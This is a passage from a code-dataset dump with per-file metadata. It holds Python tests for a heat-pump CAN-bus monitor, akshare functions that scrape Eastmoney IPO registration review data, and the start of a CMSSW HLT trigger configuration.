'Awaiting thread was unblocked only by a timeout. It means '
'that unsorted_deliveries was analyzed too late.'
)
| 31.364151
| 78
| 0.536185
| 1,770
| 16,623
| 4.911299
| 0.141243
| 0.044864
| 0.011043
| 0.023927
| 0.806166
| 0.790521
| 0.784654
| 0.781433
| 0.776717
| 0.772691
| 0
| 0.01841
| 0.372616
| 16,623
| 529
| 79
| 31.42344
| 0.815131
| 0.102148
| 0
| 0.848259
| 0
| 0
| 0.096731
| 0
| 0
| 0
| 0
| 0
| 0.052239
| 1
| 0.097015
| false
| 0
| 0.022388
| 0.0199
| 0.149254
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
54cf5a7fc7834bac1c8ddac93c56b66c551ca8f0
| 2,046
|
py
|
Python
|
py_hpsu_monitor/commands/tests/test_monitor_canbus.py
|
weltenwort/py-hpsu-monitor
|
1e170cc22a8ac063e80180f7481beb97c32e8c40
|
[
"MIT"
] | 1
|
2022-01-30T10:45:24.000Z
|
2022-01-30T10:45:24.000Z
|
py_hpsu_monitor/commands/tests/test_monitor_canbus.py
|
weltenwort/py-hpsu-monitor
|
1e170cc22a8ac063e80180f7481beb97c32e8c40
|
[
"MIT"
] | 30
|
2021-05-11T06:11:57.000Z
|
2022-03-28T20:15:08.000Z
|
py_hpsu_monitor/commands/tests/test_monitor_canbus.py
|
weltenwort/py-hpsu-monitor
|
1e170cc22a8ac063e80180f7481beb97c32e8c40
|
[
"MIT"
] | null | null | null |
from ...config import DefaultRegisterConfiguration, RegisterConfiguration
from ...elster_protocol.register_types import NumberRegisterDefinition
from ..monitor_canbus import create_register_polling_configuration
def test_create_register_polling_configuration_with_overrides():
polling_configuration = create_register_polling_configuration(
register_definition=NumberRegisterDefinition(
elster_index=0x0001, name="test-register", owner_id=0x1000
),
register_configuration=RegisterConfiguration(
elster_index=0x0001, polling_enabled=False, polling_interval=90.0
),
default_register_configuration=DefaultRegisterConfiguration(),
)
assert polling_configuration.register_definition.elster_index == 0x0001
assert polling_configuration.enabled == False
assert polling_configuration.interval == 90.0
def test_create_register_polling_configuration_with_empty_overrides():
polling_configuration = create_register_polling_configuration(
register_definition=NumberRegisterDefinition(
elster_index=0x0001, name="test-register", owner_id=0x1000
),
register_configuration=RegisterConfiguration(elster_index=0x0001),
default_register_configuration=DefaultRegisterConfiguration(),
)
assert polling_configuration.register_definition.elster_index == 0x0001
assert polling_configuration.enabled == True
assert polling_configuration.interval == 60.0
def test_create_register_polling_configuration_without_overrides():
polling_configuration = create_register_polling_configuration(
register_definition=NumberRegisterDefinition(
elster_index=0x0001, name="test-register", owner_id=0x1000
),
register_configuration=None,
default_register_configuration=DefaultRegisterConfiguration(),
)
assert polling_configuration.register_definition.elster_index == 0x0001
assert polling_configuration.enabled == True
assert polling_configuration.interval == 60.0
| 42.625
| 77
| 0.785435
| 190
| 2,046
| 8.068421
| 0.2
| 0.24788
| 0.152642
| 0.155251
| 0.819309
| 0.819309
| 0.819309
| 0.733203
| 0.733203
| 0.733203
| 0
| 0.038661
| 0.152981
| 2,046
| 47
| 78
| 43.531915
| 0.845932
| 0
| 0
| 0.605263
| 0
| 0
| 0.019062
| 0
| 0
| 0
| 0.032258
| 0
| 0.236842
| 1
| 0.078947
| false
| 0
| 0.078947
| 0
| 0.157895
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4ada198e1d536aad128a59d4a64649a12d7e7353
| 8,419
|
py
|
Python
|
akshare/stock_fundamental/stock_register.py
|
NovelResearchInvestment/akshare
|
ccce37101b26e89a46b9b8b7b27b4eebf49edccd
|
[
"MIT"
] | 721
|
2021-09-21T12:10:33.000Z
|
2022-03-31T09:47:01.000Z
|
akshare/stock_fundamental/stock_register.py
|
NovelResearchInvestment/akshare
|
ccce37101b26e89a46b9b8b7b27b4eebf49edccd
|
[
"MIT"
] | 135
|
2021-09-21T12:07:54.000Z
|
2022-03-31T14:15:36.000Z
|
akshare/stock_fundamental/stock_register.py
|
NovelResearchInvestment/akshare
|
ccce37101b26e89a46b9b8b7b27b4eebf49edccd
|
[
"MIT"
] | 234
|
2021-09-21T12:16:27.000Z
|
2022-03-31T09:47:04.000Z
|
# -*- coding:utf-8 -*-
#!/usr/bin/env python
"""
Date: 2022/1/7 17:19
Desc: 东方财富网-数据中心-新股数据-注册制审核
http://data.eastmoney.com/kcb/?type=nsb
"""
import pandas as pd
import requests
def stock_register_kcb() -> pd.DataFrame:
"""
东方财富网-数据中心-新股数据-注册制审核-科创板
http://data.eastmoney.com/kcb/?type=nsb
:return: 科创板注册制审核结果
:rtype: pandas.DataFrame
"""
url = "https://datacenter.eastmoney.com/securities/api/data/get"
params = {
'st': 'UPDATE_DATE',
'sr': '-1',
'ps': '5000',
'p': '1',
'type': 'RPT_REGISTERED_INFO',
'sty': 'ORG_CODE,ORG_CODE_OLD,ISSUER_NAME,CHECK_STATUS,CHECK_STATUS_CODE,REG_ADDRESS,CSRC_INDUSTRY,RECOMMEND_ORG,LAW_FIRM,ACCOUNT_FIRM,UPDATE_DATE,ACCEPT_DATE,TOLIST_MARKET,SECURITY_CODE',
'token': '894050c76af8597a853f5b408b759f5d',
'client': 'WEB',
'filter': '(TOLIST_MARKET="科创板")',
}
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'
}
r = requests.get(url, params=params, headers=headers)
data_json = r.json()
page_num = data_json['result']['pages']
big_df = pd.DataFrame()
for page in range(1, page_num+1):
params = {
'st': 'UPDATE_DATE',
'sr': '-1',
'ps': '5000',
'p': page,
'type': 'RPT_REGISTERED_INFO',
'sty': 'ORG_CODE,ORG_CODE_OLD,ISSUER_NAME,CHECK_STATUS,CHECK_STATUS_CODE,REG_ADDRESS,CSRC_INDUSTRY,RECOMMEND_ORG,LAW_FIRM,ACCOUNT_FIRM,UPDATE_DATE,ACCEPT_DATE,TOLIST_MARKET,SECURITY_CODE',
'token': '894050c76af8597a853f5b408b759f5d',
'client': 'WEB',
'filter': '(TOLIST_MARKET="科创板")',
}
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'
}
r = requests.get(url, params=params, headers=headers)
data_json = r.json()
temp_df = pd.DataFrame(data_json['result']["data"])
big_df = big_df.append(temp_df, ignore_index=True)
big_df.reset_index(inplace=True)
big_df['index'] = range(1, len(big_df) + 1)
big_df.columns = [
"序号",
"_",
"_",
"发行人全称",
"审核状态",
"_",
"注册地",
"证监会行业",
"保荐机构",
"律师事务所",
"会计师事务所",
"更新日期",
"受理日期",
"拟上市地点",
"_",
]
big_df = big_df[
[
"序号",
"发行人全称",
"审核状态",
"注册地",
"证监会行业",
"保荐机构",
"律师事务所",
"会计师事务所",
"更新日期",
"受理日期",
"拟上市地点",
]
]
big_df['更新日期'] = pd.to_datetime(big_df['更新日期']).dt.date
big_df['受理日期'] = pd.to_datetime(big_df['受理日期']).dt.date
return big_df
def stock_register_cyb() -> pd.DataFrame:
"""
东方财富网-数据中心-新股数据-注册制审核-创业板
http://data.eastmoney.com/xg/cyb/
:return: 创业板注册制审核结果
:rtype: pandas.DataFrame
"""
url = "https://datacenter.eastmoney.com/securities/api/data/get"
params = {
'st': 'UPDATE_DATE',
'sr': '-1',
'ps': '5000',
'p': '1',
'type': 'RPT_REGISTERED_INFO',
'sty': 'ORG_CODE,ORG_CODE_OLD,ISSUER_NAME,CHECK_STATUS,CHECK_STATUS_CODE,REG_ADDRESS,CSRC_INDUSTRY,RECOMMEND_ORG,LAW_FIRM,ACCOUNT_FIRM,UPDATE_DATE,ACCEPT_DATE,TOLIST_MARKET,SECURITY_CODE',
'token': '894050c76af8597a853f5b408b759f5d',
'client': 'WEB',
'filter': '(TOLIST_MARKET="创业板")',
}
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'
}
r = requests.get(url, params=params, headers=headers)
data_json = r.json()
page_num = data_json['result']['pages']
big_df = pd.DataFrame()
for page in range(1, page_num+1):
params = {
'st': 'UPDATE_DATE',
'sr': '-1',
'ps': '5000',
'p': page,
'type': 'RPT_REGISTERED_INFO',
'sty': 'ORG_CODE,ORG_CODE_OLD,ISSUER_NAME,CHECK_STATUS,CHECK_STATUS_CODE,REG_ADDRESS,CSRC_INDUSTRY,RECOMMEND_ORG,LAW_FIRM,ACCOUNT_FIRM,UPDATE_DATE,ACCEPT_DATE,TOLIST_MARKET,SECURITY_CODE',
'token': '894050c76af8597a853f5b408b759f5d',
'client': 'WEB',
'filter': '(TOLIST_MARKET="创业板")',
}
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'
}
r = requests.get(url, params=params, headers=headers)
data_json = r.json()
temp_df = pd.DataFrame(data_json['result']["data"])
big_df = big_df.append(temp_df, ignore_index=True)
big_df.reset_index(inplace=True)
big_df['index'] = big_df.index + 1
big_df.columns = [
"序号",
"_",
"_",
"发行人全称",
"审核状态",
"_",
"注册地",
"证监会行业",
"保荐机构",
"律师事务所",
"会计师事务所",
"更新日期",
"受理日期",
"拟上市地点",
"_",
]
big_df = big_df[
[
"序号",
"发行人全称",
"审核状态",
"注册地",
"证监会行业",
"保荐机构",
"律师事务所",
"会计师事务所",
"更新日期",
"受理日期",
"拟上市地点",
]
]
big_df['更新日期'] = pd.to_datetime(big_df['更新日期']).dt.date
big_df['受理日期'] = pd.to_datetime(big_df['受理日期']).dt.date
return big_df
def stock_register_db() -> pd.DataFrame:
"""
东方财富网-数据中心-新股数据-注册制审核-达标企业
http://data.eastmoney.com/xg/cyb/
:return: 达标企业
:rtype: pandas.DataFrame
"""
# TODO
url = "https://datacenter-web.eastmoney.com/api/data/v1/get"
params = {
'sortColumns': 'NOTICE_DATE,SECURITY_CODE',
'sortTypes': '-1,-1',
'pageSize': '50',
'pageNumber': '1',
'reportName': 'RPT_KCB_IPO',
'columns': 'KCB_LB',
'source': 'WEB',
'client': 'WEB',
'filter': '(ORG_TYPE_CODE="03")',
}
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'
}
r = requests.get(url, params=params, headers=headers)
data_json = r.json()
page_num = data_json['result']['pages']
big_df = pd.DataFrame()
for page in range(1, page_num+1):
params.update({'pageNumber': page})
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'
}
r = requests.get(url, params=params, headers=headers)
data_json = r.json()
temp_df = pd.DataFrame(data_json['result']['data'])
big_df = big_df.append(temp_df, ignore_index=True)
big_df.reset_index(inplace=True)
big_df['index'] = range(1, len(big_df) + 1)
big_df.columns = [
"序号",
"_",
"_",
"_",
"企业名称",
"_",
"_",
"_",
"_",
"_",
"_",
"_",
"_",
"_",
"_",
"_",
"_",
"经营范围",
"_",
"_",
"_",
"_",
"_",
"_",
"_",
"_",
"_",
"_",
"近三年营业收入-2019",
"近三年净利润-2019",
"近三年研发费用-2019",
"近三年营业收入-2018",
"近三年净利润-2018",
"近三年研发费用-2018",
"近三年营业收入-2017",
"近三年净利润-2017",
"近三年研发费用-2017",
"近两年累计净利润",
"_",
"_",
"_",
"_",
"_",
]
big_df = big_df[
[
"序号",
"企业名称",
"经营范围",
"近三年营业收入-2019",
"近三年净利润-2019",
"近三年研发费用-2019",
"近三年营业收入-2018",
"近三年净利润-2018",
"近三年研发费用-2018",
"近三年营业收入-2017",
"近三年净利润-2017",
"近三年研发费用-2017",
"近两年累计净利润",
]
]
return big_df
if __name__ == "__main__":
stock_register_kcb_df = stock_register_kcb()
print(stock_register_kcb_df)
stock_register_cyb_df = stock_register_cyb()
print(stock_register_cyb_df)
stock_register_db_df = stock_register_db()
print(stock_register_db_df)
| 28.733788
| 200
| 0.525003
| 952
| 8,419
| 4.396008
| 0.17437
| 0.0454
| 0.022939
| 0.032975
| 0.887455
| 0.885066
| 0.837754
| 0.808602
| 0.808602
| 0.808602
| 0
| 0.067416
| 0.312864
| 8,419
| 292
| 201
| 28.832192
| 0.656007
| 0.053569
| 0
| 0.815686
| 0
| 0.039216
| 0.364225
| 0.120477
| 0
| 0
| 0
| 0.003425
| 0
| 1
| 0.011765
| false
| 0
| 0.007843
| 0
| 0.031373
| 0.011765
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ab1ee516590025b672ef3acae956f2702f1b4a02
| 320,434
|
py
|
Python
|
Calibration/PPSAlCaRecoProducer/test/setup_dev_CMSSW_12_1_0_GRun_V14_cff.py
|
ZhengGang85129/cmssw
|
b5958a19590750f49976901ec024730bd2d31c80
|
[
"Apache-2.0"
] | null | null | null |
Calibration/PPSAlCaRecoProducer/test/setup_dev_CMSSW_12_1_0_GRun_V14_cff.py
|
ZhengGang85129/cmssw
|
b5958a19590750f49976901ec024730bd2d31c80
|
[
"Apache-2.0"
] | null | null | null |
Calibration/PPSAlCaRecoProducer/test/setup_dev_CMSSW_12_1_0_GRun_V14_cff.py
|
ZhengGang85129/cmssw
|
b5958a19590750f49976901ec024730bd2d31c80
|
[
"Apache-2.0"
] | null | null | null |
# This file is automatically generated by hltGetConfiguration.
# /dev/CMSSW_12_1_0/GRun/V14 (CMSSW_12_1_0)
import FWCore.ParameterSet.Config as cms
HLTConfigVersion = cms.PSet(
tableName = cms.string('/dev/CMSSW_12_1_0/GRun/V14')
)
transferSystem = cms.PSet(
destinations = cms.vstring( 'Tier0',
'DQM',
'ECAL',
'EventDisplay',
'Lustre',
'None' ),
transferModes = cms.vstring( 'default',
'test',
'emulator' ),
streamA = cms.PSet(
default = cms.vstring( 'Tier0' ),
test = cms.vstring( 'Lustre' ),
emulator = cms.vstring( 'Lustre' )
),
streamCalibration = cms.PSet(
default = cms.vstring( 'Tier0' ),
test = cms.vstring( 'Lustre' ),
emulator = cms.vstring( 'None' )
),
streamDQM = cms.PSet(
default = cms.vstring( 'DQM' ),
test = cms.vstring( 'DQM',
'Lustre' ),
emulator = cms.vstring( 'None' )
),
streamDQMCalibration = cms.PSet(
default = cms.vstring( 'DQM' ),
test = cms.vstring( 'DQM',
'Lustre' ),
emulator = cms.vstring( 'None' )
),
streamEcalCalibration = cms.PSet(
default = cms.vstring( 'ECAL' ),
test = cms.vstring( 'ECAL' ),
emulator = cms.vstring( 'None' )
),
streamEventDisplay = cms.PSet(
default = cms.vstring( 'EventDisplay',
'Tier0' ),
test = cms.vstring( 'EventDisplay',
'Lustre' ),
emulator = cms.vstring( 'None' )
),
streamExpressCosmics = cms.PSet(
default = cms.vstring( 'Tier0' ),
test = cms.vstring( 'Lustre' ),
emulator = cms.vstring( 'Lustre' )
),
streamNanoDST = cms.PSet(
default = cms.vstring( 'Tier0' ),
test = cms.vstring( 'Lustre' ),
emulator = cms.vstring( 'None' )
),
streamRPCMON = cms.PSet(
default = cms.vstring( 'Tier0' ),
test = cms.vstring( 'Lustre' ),
emulator = cms.vstring( 'None' )
),
streamTrackerCalibration = cms.PSet(
default = cms.vstring( 'Tier0' ),
test = cms.vstring( 'Lustre' ),
emulator = cms.vstring( 'None' )
),
default = cms.PSet(
default = cms.vstring( 'Tier0' ),
test = cms.vstring( 'Lustre' ),
emulator = cms.vstring( 'Lustre' ),
streamLookArea = cms.PSet( )
),
streamLookArea = cms.PSet(
default = cms.vstring( 'DQM' ),
test = cms.vstring( 'DQM',
'Lustre' ),
emulator = cms.vstring( 'None' )
)
)
HLTPSetInitialCkfTrajectoryFilterForHI = cms.PSet(
minimumNumberOfHits = cms.int32( 6 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 0.9 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 1.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 999.0 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTIter0PSetTrajectoryBuilderIT = cms.PSet(
ComponentType = cms.string( "CkfTrajectoryBuilder" ),
lostHitPenalty = cms.double( 30.0 ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTIter0PSetTrajectoryFilterIT" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
maxCand = cms.int32( 2 ),
alwaysUseInvalidHits = cms.bool( False ),
estimator = cms.string( "hltESPChi2ChargeMeasurementEstimator9" ),
intermediateCleaning = cms.bool( True ),
updator = cms.string( "hltESPKFUpdator" ),
seedAs5DHit = cms.bool( False )
)
HLTIter4PSetTrajectoryBuilderIT = cms.PSet(
ComponentType = cms.string( "CkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "hltIter4ESPMeasurementTracker" ),
lostHitPenalty = cms.double( 30.0 ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTIter4PSetTrajectoryFilterIT" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.untracked.int32( 4 ),
maxCand = cms.int32( 1 ),
alwaysUseInvalidHits = cms.bool( False ),
estimator = cms.string( "hltESPChi2ChargeMeasurementEstimator16" ),
intermediateCleaning = cms.bool( True ),
updator = cms.string( "hltESPKFUpdator" ),
seedAs5DHit = cms.bool( False )
)
HLTPSetTobTecStepInOutTrajectoryFilterBase = cms.PSet(
minimumNumberOfHits = cms.int32( 4 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 0.1 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 1 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 0 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTIter0GroupedCkfTrajectoryBuilderIT = cms.PSet(
keepOriginalIfRebuildFails = cms.bool( False ),
lockHits = cms.bool( True ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTIter0PSetTrajectoryFilterIT" ) ),
doSeedingRegionRebuilding = cms.bool( False ),
useHitsSplitting = cms.bool( False ),
maxCand = cms.int32( 2 ),
estimator = cms.string( "hltESPChi2ChargeMeasurementEstimator9" ),
intermediateCleaning = cms.bool( True ),
bestHitOnly = cms.bool( True ),
useSameTrajFilter = cms.bool( True ),
MeasurementTrackerName = cms.string( "hltESPMeasurementTracker" ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
lostHitPenalty = cms.double( 30.0 ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
cleanTrajectoryAfterInOut = cms.bool( False ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
alwaysUseInvalidHits = cms.bool( False ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTIter0PSetTrajectoryFilterIT" ) ),
foundHitBonus = cms.double( 5.0 ),
updator = cms.string( "hltESPKFUpdator" ),
seedAs5DHit = cms.bool( False )
)
HLTSiStripClusterChargeCutTiny = cms.PSet( value = cms.double( 800.0 ) )
HLTPSetTrajectoryFilterIT = cms.PSet(
minimumNumberOfHits = cms.int32( 3 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 0.3 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 1.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 999.0 ),
maxLostHits = cms.int32( 1 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTIter4PSetTrajectoryFilterIT = cms.PSet(
minimumNumberOfHits = cms.int32( 6 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 0.3 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 1.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 999.0 ),
maxLostHits = cms.int32( 0 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetTrajectoryBuilderForElectrons = cms.PSet(
ComponentType = cms.string( "CkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "hltESPMeasurementTracker" ),
lostHitPenalty = cms.double( 90.0 ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
propagatorOpposite = cms.string( "hltESPBwdElectronPropagator" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetTrajectoryFilterForElectrons" ) ),
propagatorAlong = cms.string( "hltESPFwdElectronPropagator" ),
maxCand = cms.int32( 5 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPChi2ChargeMeasurementEstimator30" ),
intermediateCleaning = cms.bool( False ),
updator = cms.string( "hltESPKFUpdator" ),
seedAs5DHit = cms.bool( False )
)
HLTPSetPvClusterComparerForIT = cms.PSet(
track_chi2_max = cms.double( 20.0 ),
track_pt_max = cms.double( 20.0 ),
track_prob_min = cms.double( -1.0 ),
track_pt_min = cms.double( 1.0 )
)
HLTPSetMixedStepTrajectoryFilter = cms.PSet(
minimumNumberOfHits = cms.int32( 3 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 0.1 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 1.4 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetInitialCkfTrajectoryBuilderForHI = cms.PSet(
ComponentType = cms.string( "CkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "hltESPMeasurementTracker" ),
lostHitPenalty = cms.double( 30.0 ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
propagatorOpposite = cms.string( "PropagatorWithMaterialOppositeForHI" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetInitialCkfTrajectoryFilterForHI" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialForHI" ),
maxCand = cms.int32( 5 ),
alwaysUseInvalidHits = cms.bool( False ),
estimator = cms.string( "hltESPChi2MeasurementEstimator30" ),
intermediateCleaning = cms.bool( False ),
updator = cms.string( "hltESPKFUpdator" ),
seedAs5DHit = cms.bool( False )
)
HLTPSetMuonCkfTrajectoryBuilder = cms.PSet(
rescaleErrorIfFail = cms.double( 1.0 ),
ComponentType = cms.string( "MuonCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "hltESPMeasurementTracker" ),
lostHitPenalty = cms.double( 30.0 ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
propagatorOpposite = cms.string( "PropagatorWithMaterialOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetMuonCkfTrajectoryFilter" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterial" ),
maxCand = cms.int32( 5 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPChi2ChargeMeasurementEstimator30" ),
intermediateCleaning = cms.bool( False ),
propagatorProximity = cms.string( "SteppingHelixPropagatorAny" ),
updator = cms.string( "hltESPKFUpdator" ),
deltaEta = cms.double( -1.0 ),
useSeedLayer = cms.bool( False ),
deltaPhi = cms.double( -1.0 ),
seedAs5DHit = cms.bool( False )
)
HLTIter0HighPtTkMuPSetTrajectoryFilterIT = cms.PSet(
minimumNumberOfHits = cms.int32( 3 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 0.3 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 1.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 999.0 ),
maxLostHits = cms.int32( 1 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetPvClusterComparerForBTag = cms.PSet(
track_chi2_max = cms.double( 20.0 ),
track_pt_max = cms.double( 20.0 ),
